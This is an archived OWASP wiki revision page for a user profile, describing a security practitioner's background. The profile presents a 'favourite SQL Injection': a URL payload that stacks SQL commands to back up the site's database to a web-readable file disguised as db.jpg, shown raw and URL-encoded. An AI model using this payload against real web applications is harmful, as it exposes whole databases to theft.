This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "User:HynekPetrak"

From OWASP
Jump to: navigation, search
m (Creating user page for new user.)
 
 
Line 1: Line 1:
 
Used to work in research and development for automation, real-time and embedded systems for almost 10 years. Now working more in IT, touching security area too. Passionate about c, c++, c#, python. Time to time doing application code reviews, penetration testing.  
 
Used to work in research and development for automation, real-time and embedded systems for almost 10 years. Now working more in IT, touching security area too. Passionate about c, c++, c#, python. Time to time doing application code reviews, penetration testing.  
  
In order to meet the 50 words requirement, I put one of my SQL Injections:
+
My fovourite SQL Injection:
  
https://e-comerce.example.com/?lang=1;declare @db varchar(255); select db=db_name(); backup database @db to disk='c:\Inetpub\wwwroot\Images\db.jpg'
+
https://e-comerce.example.com/?lang=1;declare%20@db%20varchar(255);%20select%20db=db_name();%20backup%20database%20@db%20to%20disk='c:\Inetpub\wwwroot\Images\db.jpg'

Latest revision as of 20:14, 12 June 2015

Used to work in research and development for automation, real-time and embedded systems for almost 10 years. Now working more in IT, touching security area too. Passionate about c, c++, c#, python. Time to time doing application code reviews, penetration testing.

My fovourite SQL Injection:

https://e-comerce.example.com/?lang=1;declare%20@db%20varchar(255);%20select%20db=db_name();%20backup%20database%20@db%20to%20disk='c:\Inetpub\wwwroot\Images\db.jpg'